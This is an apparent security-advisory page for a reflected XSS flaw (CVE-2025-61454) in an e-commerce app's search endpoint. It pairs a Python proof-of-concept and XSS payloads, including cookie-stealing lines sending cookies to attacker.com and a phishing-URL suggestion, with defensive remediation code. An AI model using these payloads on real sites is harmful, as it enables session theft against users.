Security Vulnerability Report
CVE-2025-61454 CVSS 6.1 MEDIUM

CVE-2025-61454

Published: 2025-10-20 13:15:45
Last Modified: 2026-04-15 00:35:42

Description

A Cross-Site Scripting (XSS) vulnerability exists in Bhabishya-123 E-commerce 1.0, specifically within the search endpoint. Unsanitized input in the /search parameter is directly reflected back into the response HTML, allowing attackers to execute arbitrary JavaScript in the browser of a user who visits a malicious link or submits a crafted request.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Bhabishya-123 E-commerce 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
## CVE-2025-61454 - Reflected XSS PoC for Bhabishya-123 E-commerce 1.0
## Vulnerability Location: /search endpoint
## The /search parameter reflects user input directly into HTML response without sanitization

## ============================================
## PoC 1: Basic Reflected XSS via GET request
## ============================================
# Target URL format:
# http://target.com/search?q=<script>alert('XSS')</script>

import requests

target_url = "http://target.com/search"

# Payload 1: Simple script injection
payload_script = '<script>alert("XSS-Vulnerability-CVE-2025-61454")</script>'

# Payload 2: Event handler based (bypasses some filters)
payload_img = '<img src=x onerror=alert(document.cookie)>'

# Payload 3: SVG-based XSS
payload_svg = '<svg/onload=alert(1)>'

# Payload 4: Cookie stealing (for demonstration)
# Replace with attacker's controlled server
attacker_server = "http://attacker.com/steal"
payload_cookie_steal = f'<script>new Image().src="{attacker_server}?c="+document.cookie</script>'


def exploit_xss(target_url, parameter, payload):
    """
    Send a crafted request to the vulnerable search endpoint
    and verify if the payload is reflected in the response.
    """
    params = {parameter: payload}
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }
    response = requests.get(target_url, params=params, headers=headers)

    # Check if the payload is reflected in the response (indicating XSS)
    if payload in response.text:
        print("[+] XSS Confirmed! Payload reflected in response.")
        print(f"[+] Target: {target_url}")
        print(f"[+] Parameter: {parameter}")
        print(f"[+] Payload: {payload}")
        print(f"[+] Status Code: {response.status_code}")
        return True
    else:
        print("[-] Payload not reflected. Target may not be vulnerable.")
        return False


# Run exploit
if __name__ == "__main__":
    # Try multiple payloads against the /search endpoint
    payloads = [payload_script, payload_img, payload_svg]
    for p in payloads:
        print(f"\n[*] Testing payload: {p[:50]}...")
        exploit_xss(target_url, "q", p)

## ============================================
## PoC 2: URL that can be sent to victims
## ============================================
# Malicious URL to distribute via phishing/social engineering:
# http://target.com/search?q=<script>alert(document.domain)</script>
#
# For cookie theft:
# http://target.com/search?q=<script>fetch("http://attacker.com/?c="+document.cookie)</script>

## ============================================
## PoC 3: cURL command for manual testing
## ============================================
# curl -v "http://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E"

## Remediation Notes:
## - Implement HTML entity encoding on all user-supplied output
## - Use Content-Security-Policy (CSP) headers
## - Sanitize input using a whitelist approach
## - Use frameworks that auto-escape output (e.g., React, Angular)
```
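To make the remediation notes concrete, the following is an added example (not code from this page or from the Bhabishya-123 project, whose source is not shown here). It contrasts a minimal search handler that reflects the q parameter straight into the HTML, as the CVE describes, with a hardened version that entity-encodes the value and sets a Content-Security-Policy header; the endpoint path /search and parameter name q come from the PoC, while the handler structure and the sample request are assumptions constructed for the demonstration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample request carrying the PoC 3 payload (URL-encoded <script> tag).
SAMPLE_URL = "/search?q=%3Cscript%3Ealert(1)%3C/script%3E"


def query_param(url, name):
    """Return the first decoded value of a query parameter, or '' if absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_search_vulnerable(url):
    """The CWE-79 pattern the CVE describes: q is interpolated into HTML unencoded."""
    q = query_param(url, "q")
    body = f"<h1>Results for: {q}</h1>"
    return {"body": body, "headers": {"Content-Type": "text/html; charset=utf-8"}}


def render_search_fixed(url):
    """Hardened handler: entity-encode q at the output point and add a restrictive CSP."""
    q = query_param(url, "q")
    # html.escape turns < > & " ' into entities, so the browser renders the
    # search term as text instead of parsing it as markup.
    body = f"<h1>Results for: {html.escape(q, quote=True)}</h1>"
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        # Defence in depth: should an encoding slip remain elsewhere, inline
        # scripts and inline event handlers are blocked by this policy.
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    }
    return {"body": body, "headers": headers}


def reflects_raw_markup(url, response_body):
    """Detection check mirroring the PoC's test: is the raw, tag-bearing q value echoed verbatim?"""
    q = query_param(url, "q")
    return "<" in q and q in response_body
```

The detection helper is the same string-containment test the PoC uses, so it can be pointed at either handler to confirm the fix changes the observable behaviour rather than just the headers.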

References

https://github.com/tansique-17/CVE-2025-61454

Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation, Cross-site Scripting)

Record status: Deferred